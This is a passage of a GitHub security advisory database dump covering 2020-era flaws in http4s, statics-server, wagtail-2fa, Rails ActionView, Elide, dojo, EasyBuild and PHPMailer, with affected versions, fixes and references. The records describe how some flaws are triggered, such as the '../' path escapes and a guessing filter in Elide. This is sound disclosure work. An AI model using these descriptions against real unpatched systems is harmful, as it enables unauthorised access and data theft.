'https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-24'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-2/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-31T15:28:17Z', 'nvd_published_at': '2020-03-12T13:15:00Z'}"
+1.4.0,GHSA-7fhm-mqm4-2wp7,2020-04-03T21:54:52Z,2020-03-13T20:36:16Z,2020-04-03T21:47:06Z,[],Withdrawn: ESLint dependencies are vulnerable (ReDoS and Prototype Pollution),"**Withdrawn**
+GitHub has withdrawn this advisory in place of GHSA-vh95-rmgr-6w4m and GHSA-6chw-6frg-f759.
+The reason for withdrawing is that some mistakes were made during the ingestion of CVE-2020-7598
+which caused this advisory to be published with incorrect information.
+
+In order to provide accurate advisory information, new advisories were created:
+
+- minimist: https://github.com/advisories/GHSA-vh95-rmgr-6w4m
+- acorn: https://github.com/advisories/GHSA-6chw-6frg-f759",[],"[{'package': {'ecosystem': 'npm', 'name': 'minimist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-6chw-6frg-f759'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-vh95-rmgr-6w4m'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T20:21:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-66q9-f7ff-mmx6,2021-01-14T17:48:17Z,2020-03-25T17:35:51Z,,['CVE-2020-5280'],Local file inclusion vulnerability in http4s,"### Impact
+
+This vulnerability applies to all users of:
+* `org.http4s.server.staticcontent.FileService`
+* `org.http4s.server.staticcontent.ResourceService`
+* `org.http4s.server.staticcontent.WebjarService`
+
+#### Path escaping
+
+URI normalization is applied incorrectly. Requests whose path info contain `../` or `//` can expose resources outside of the configured location. Specifically:
+
+* `FileService` may expose any file on the local file system.
+* `ResourceService` may expose any resource on the class path.
+
+#### Prefix matching
+
+When the service is configured with a non-empty `pathPrefix` that doesn't end in a slash, any directories whose names are a prefix of `systemPath` (from `FileService`) or `pathPrefix` (from `ResourceService`) are exposed. For example, if `pathPrefix` is `/foo` and `systemPath` is `/bar`, a request to `/foobaz/quux.txt` exposes file `/barbaz/quux.txt`, when only files beneath `/bar` should be available.
+
+#### URI decoding
+
+URI segments are not decoded before resource resolution. This causes resources with reserved characters in their name to incorrectly return a 404. It also may incorrectly expose the rare resource whose name is URI encoded. This applies to `FileService`, `ResourceService`, and `WebjarService`.
+
+### Patches
+
+In all three services, paths with an empty segment, a `.` segment, or a `..` segment are now rejected with a `400 Bad Request` response. This fixes exposure outside the configured root. Many clients already eliminate dot segments according to the rules in [RFC3986, Section 5.2.4](https://tools.ietf.org/html/rfc3986#section-5.2.4). A middleware that does so at the server level may be considered if there is demand.
+
+If `pathInfo` is non-empty, and does not begin with `/`, then a 404 response is generated. This fixes the prefix matching exposure.
+
+All path segments are URI decoded before being passed to the file system or resource path. This allows resolution of resources with reserved characters in the name, and prevents incorrect exposure of resources whose names are themselves URI encoded.
+
+### Workarounds
+
+The recommended course is to upgrade:
+* v0.18.26, binary compatible with the 0.18.x series
+* v0.20.20, binary compatible with the 0.20.x series
+* v0.21.2, binary compatible with the 0.21.x series
+
+Note that 0.19.0 is a deprecated release and has never been supported.
+
+If an upgrade is impossible:
+
+* Temporarily copy `FileService.scala`, `ResourceService.scala`, and `WebjarService.scala` from the appropriate release series into your project and recompile with that, changing the package name and reference in your application.
+* Users of a servlet backend can use the servlet container's file serving capabilities.
+
+### Credits
+
+Thank you to Thomas Gøytil for the discovery, responsible disclosure, and assistance testing of this vulnerability.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [http4s/http4s](http://github.com/http4s/http4s)
+* Email a maintainer:
+ * [Ross A. Baker](mailto:ross@rossabaker.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.26'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.20.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.21.0'}, {'fixed': '0.21.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-66q9-f7ff-mmx6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5280'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/commit/250afddbb2e65b70ca9ddaec9d1eb3aaa56de7ec'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/commit/752b3f63a05a31d2de4f8706877aa08d6b89efca'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/commit/b87f31b2292dabe667bec3b04ce66176c8a3e17b'}]","{'cwe_ids': ['CWE-23'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-25T17:34:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j27j-4w6m-8fc4,2020-08-31T18:54:26Z,2020-03-31T17:02:12Z,,['CVE-2019-15596'],Path Traversal in statics-server,"All versions of `statics-server` are vulnerable to Path Traversal. The package fails to limit access to files outside of the served folder through symlinks.
+
+
+## Recommendation
+
+No fix is currently available. Do not use `statics-server` in production or consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'statics-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15596'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/695416'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1303'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-31T15:38:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9gjv-6qq6-v7qm,2021-01-08T20:26:35Z,2020-03-13T21:18:55Z,,['CVE-2020-5240'],2FA bypass through deleting devices in wagtail-2fa,"### Impact
+Any user with access to the CMS can view and delete other users' 2FA devices by going to the correct path. The user does not require special permissions in order to do so. By deleting the other user's device they can disable the target user's 2FA devices and potentially compromise the account if they figure out their password.
+
+### Patches
+The problem has been patched in version 1.4.1.
+
+### Workarounds
+There is no workaround for this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [github.com/labd/wagtail-2fa](https://github.com/labd/wagtail-2fa)
+* Email us at [security@labdigital.nl](mailto:security@labdigital.nl)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail-2fa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/labd/wagtail-2fa/security/advisories/GHSA-9gjv-6qq6-v7qm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5240'}, {'type': 'WEB', 'url': 'https://github.com/labd/wagtail-2fa/commit/ac23550d33b7436e90e3beea904647907eba5b74'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T21:18:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-65cv-r6x7-79hv,2023-02-03T20:47:05Z,2020-03-19T17:30:29Z,,['CVE-2020-5267'],Cross site scripting vulnerability in ActionView,"There is a possible cross site scripting (XSS) vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks.
+
+### Impact
+
+There is a possible XSS vulnerability in the `j` and `escape_javascript` methods in ActionView. These methods are used for escaping JavaScript string literals. Impacted code will look something like this:
+
+```erb
+
+```
+
+or
+
+```erb
+
+```
+
+### Releases
+
+The 6.0.2.2 and 5.2.4.2 releases are available at the normal locations.
+
+### Workarounds
+
+For those that can't upgrade, the following monkey patch may be used:
+
+```ruby
+ActionView::Helpers::JavaScriptHelper::JS_ESCAPE_MAP.merge!(
+ {
+ ""`"" => ""\\`"",
+ ""$"" => ""\\$""
+ }
+)
+
+module ActionView::Helpers::JavaScriptHelper
+ alias :old_ej :escape_javascript
+ alias :old_j :j
+
+ def escape_javascript(javascript)
+ javascript = javascript.to_s
+ if javascript.empty?
+ result = """"
+ else
+ result = javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r""']|[`]|[$])/u, JS_ESCAPE_MAP)
+ end
+ javascript.html_safe? ? result.html_safe : result
+ end
+
+ alias :j :escape_javascript
+end
+```
+
+### Patches
+
+To aid users who aren't able to upgrade immediately we have provided patches for
+the two supported release series. They are in git-am format and consist of a
+single changeset.
+
+* [5-2-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-5-2-js-helper-xss-patch) - Patch for 5.2 series
+* [6-0-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-6-0-js-helper-xss-patch) - Patch for 6.0 series
+
+Please note that only the 5.2 and 6.0 series are supported at present. Users
+of earlier unsupported releases are advised to upgrade as soon as possible as we
+cannot guarantee the continued availability of security fixes for unsupported
+releases.
+
+### Credits
+
+Thanks to Jesse Campos from Chef Secure","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.1'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.2.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/rails/rails/security/advisories/GHSA-65cv-r6x7-79hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5267'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/033a738817abd6e446e1b320cb7d1a5c15224e9a'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-5267.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00022.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00019.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/03/19/1'}]","{'cwe_ids': ['CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-19T17:29:40Z', 'nvd_published_at': '2020-03-19T18:15:00Z'}"
+1.4.0,GHSA-2mxr-89gf-rc4v,2021-01-08T20:25:19Z,2020-03-30T20:09:58Z,,['CVE-2020-5289'],Read permissions not enforced for client provided filter expressions in Elide.,"### Impact
+It is possible for an adversary to ""guess and check"" the value of a model field they do not have access to assuming they can read at least one other field in the model. The adversary can construct filter expressions for an inaccessible field to filter a collection. The presence or absence of models in the returned collection can be used to reconstruct the value of the inaccessible field.
+
+For example, a User model has two fields: _name_ and _role_. The adversary has read permissions to see the _name_ field of the User collection but not the _role_. By constructing a filter like the one below, the adversary can determine which users have admin role by presence or absence in the returned collection:
+`filter=role==""Admin""`
+
+### Patches
+Resolved in Elide 4.5.14 and greater.
+
+### Workarounds
+The adversary can only access the fields if a model includes fields with different read permission levels (some less secure and some more secure). Model security can be adjusted by restricting read permissions on existing models.
+
+### References
+Fixed in https://github.com/yahoo/elide/pull/1236
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [elide](https://github.com/yahoo/elide)
+* Contact us at [spectrum](https://spectrum.chat/elide?tab=posts)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.yahoo.elide:elide-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/yahoo/elide/security/advisories/GHSA-2mxr-89gf-rc4v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5289'}, {'type': 'WEB', 'url': 'https://github.com/yahoo/elide/pull/1236'}, {'type': 'WEB', 'url': 'https://github.com/yahoo/elide/pull/1236/commits/a985f0f9c448aabe70bc904337096399de4576dc'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T20:08:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jxfh-8wgv-vfr2,2022-02-08T22:06:45Z,2020-03-10T18:03:14Z,,['CVE-2020-5258'],Prototype pollution in dojo,"In affected versions of dojo (NPM package), the deepCopy method is vulnerable to Prototype Pollution.
+
+Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects.
+An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values.
+
+This has been patched in versions 1.12.8, 1.13.7, 1.14.6, 1.15.3 and 1.16.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dojo/dojo/security/advisories/GHSA-jxfh-8wgv-vfr2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5258'}, {'type': 'WEB', 'url': 'https://github.com/dojo/dojo/commit/20a00afb68f5587946dc76fbeaa68c39bda2171d'}, {'type': 'PACKAGE', 'url': 'https://github.com/dojo/dojo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3638722360d7ae95f874280518b8d987d799a76df7a9cd78eac33a1b@%3Cusers.qpid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r665fcc152bd0fec9f71511a6c2435ff24d3a71386b01b1a6df326fd3@%3Cusers.qpid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf481b3f25f05c52ba4e24991a941c1a6e88d281c6c9360a806554d00@%3Cusers.qpid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00012.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-10T18:02:00Z', 'nvd_published_at': '2020-03-10T18:15:00Z'}"
+1.4.0,GHSA-2wx6-wc87-rmjm,2021-01-26T03:25:42Z,2020-03-19T17:29:58Z,,['CVE-2020-5262'],GitHub personal access token leaking into temporary EasyBuild (debug) logs,"### Impact
+
+The GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--from-pr`, etc.) is shown in plain text in EasyBuild debug log files.
+
+Scope:
+
+* the log message only appears in the top-level log file, *not* in the individual software installation logs (see https://easybuild.readthedocs.io/en/latest/Logfiles.html);
+ - as a consequence, tokens are *not* included in the partial log files that are uploaded into a gist when using `--upload-test-report` in combination with `--from-pr`, nor in the installation logs that are copied to the software installation directories;
+* the message is only logged when using `--debug`, so it will not appear when using the default EasyBuild configuration (only info messages are logged by default);
+* the log message is triggered via `--from-pr`, but also via various other GitHub integration options like `--new-pr`, `--merge-pr`, `--close-pr`, etc., but usually only appears in the temporary log file that is cleaned up automatically as soon as eb completes successfully;
+* you may have several debug log files that include your GitHub token in `/tmp` (or a different location if you've set the `--tmpdir` EasyBuild configuration option) on the systems where you use EasyBuild, but they are located in a subdirectory that is only accessible to your account (permissions set to 700);
+* the only way that a log file that may include your token could have been made public is *if you shared it yourself*, for example by copying the contents of the log file into a gist manually, or by sending a log file to someone;
+* for log files uploaded to GitHub, your token would be revoked automatically when GitHub notices it;
+
+### Patches
+
+The issue is fixed with the changes in https://github.com/easybuilders/easybuild-framework/pull/3248.
+
+This fix is included in EasyBuild v4.1.2 (released on Mon Mar 16th 2020), and in the `master`+ `develop` branches of the `easybuild-framework` repository since Mon Mar 16th 2020 (see https://github.com/easybuilders/easybuild-framework/pull/3248 and https://github.com/easybuilders/easybuild-framework/pull/3249 resp.).
+
+**Make sure you revoke the existing GitHub tokens you're using with EasyBuild** (via https://github.com/settings/tokens), and install new ones using ""`eb --install-github-token --force`"" (see also https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html#installing-a-github-token-install-github-token).
+
+### Workarounds
+
+* avoid using the GitHub integration features (see https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html) with EasyBuild versions older than version 4.1.2;
+* don't share top-level EasyBuild (debug) log files with others, unless you are sure your GitHub token is not included in them;
+* clean up temporary EasyBuild log files in `/tmp`on the system(s) where you`re using EasyBuild
+
+### References
+
+* https://github.com/easybuilders/easybuild-framework/pull/3248 (PR that fixes the issue)
+* (release announcement to EasyBuild mailing list)
+
+### For more information
+
+* Open an issue in [the `easybuild-framework` repository](https://github.com/easybuilders/easybuild-framework)
+* Email us at [easybuild-admin@lists.ugent.be](mailto:easybuild-admin@lists.ugent.be)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'easybuild-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/easybuilders/easybuild-framework/security/advisories/GHSA-2wx6-wc87-rmjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5262'}, {'type': 'WEB', 'url': 'https://github.com/easybuilders/easybuild-framework/pull/3248'}, {'type': 'WEB', 'url': 'https://github.com/easybuilders/easybuild-framework/pull/3249'}, {'type': 'WEB', 'url': 'https://github.com/easybuilders/easybuild-framework/commit/210743d0e3618a8ac0a56eb9c0f4fa4fd8ae53b9'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-19T17:04:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qh62-ch95-63wh,2020-06-16T20:41:56Z,2020-03-13T20:05:10Z,2020-06-16T20:25:44Z,[],python-gnupg allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended,**Withdrawn:** Duplicate of GHSA-2fch-jvg5-crf6,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'python-gnupg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-6690'}, {'type': 'WEB', 'url': 'https://bitbucket.org/vinay.sajip/python-gnupg/commits/1a5196800604c05f9e347110b4ecca538ba68cdc'}, {'type': 'WEB', 'url': 'https://blog.hackeriet.no/cve-2019-6690-python-gnupg-vulnerability/'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/02/msg00021.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6KYZMN2PWXY4ENZVJUVTGFBVYEVY7II/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/python-gnupg/#history'}, {'type': 'WEB', 'url': 'https://seclists.org/bugtraq/2019/Jan/41'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/3964-1/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00008.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00058.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/151341/Python-GnuPG-0.4.3-Improper-Input-Validation.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106756'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T20:04:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4pc3-96mx-wwc8,2023-09-06T13:48:23Z,2020-03-05T22:09:14Z,,['CVE-2016-10045'],Remote code execution in PHPMailer,"### Impact
+The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
+
+This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
+
+### Patches
+Fixed in 5.2.20
+
+### Workarounds
+Send via SMTP to localhost instead of calling the `mail()` function.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2016-10045
+See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.20'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-4pc3-96mx-wwc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10045'}, {'type': 'WEB', 'url': 'https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2016-10045.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/PHPMailer/PHPMailer'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities'}, {'type': 'WEB', 'url': 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40969/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40986/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/42221/'}, {'type': 'WEB', 'url': 'http://openwall.com/lists/oss-security/2016/12/28/1'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2016/Dec/81'}, {'type': 'WEB', 'url': 'http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/539967/100/0/threaded'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/95130'}, {'type': 'WEB', 'url': 'http://www.securitytracker.com/id/1037533'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T22:06:01Z', 'nvd_published_at': '2016-12-30T19:59:00Z'}"
+1.4.0,GHSA-4x5h-cr29-fhp6,2021-08-19T19:50:50Z,2020-03-05T22:09:10Z,,['CVE-2017-5223'],Local file disclosure in PHPMailer,"An issue was discovered in PHPMailer before 5.2.22. PHPMailer's `msgHTML` method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using a script-provided base directory. If no base directory is provided, it resolves to `/`, meaning that relative image URLs get treated as absolute local file paths and added as attachments. To form a remote vulnerability, the msgHTML method must be called, passed an unfiltered, user-supplied HTML document, and must not set a base directory.
+
+### Impact
+Arbitrary local files can be attached to email messages.
+
+### Patches
+Fixed in 5.2.22
+
+### Workarounds
+Validate input before using user-supplied file paths.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2017-5223
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.22'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-4x5h-cr29-fhp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-5223'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2017-5223.yaml'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.22'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/43056/'}, {'type': 'WEB', 'url': 'http://kalilinux.co/2017/01/12/phpmailer-cve-2017-5223-local-information-disclosure-vulnerability-analysis/'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/95328'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T22:07:31Z', 'nvd_published_at': None}"
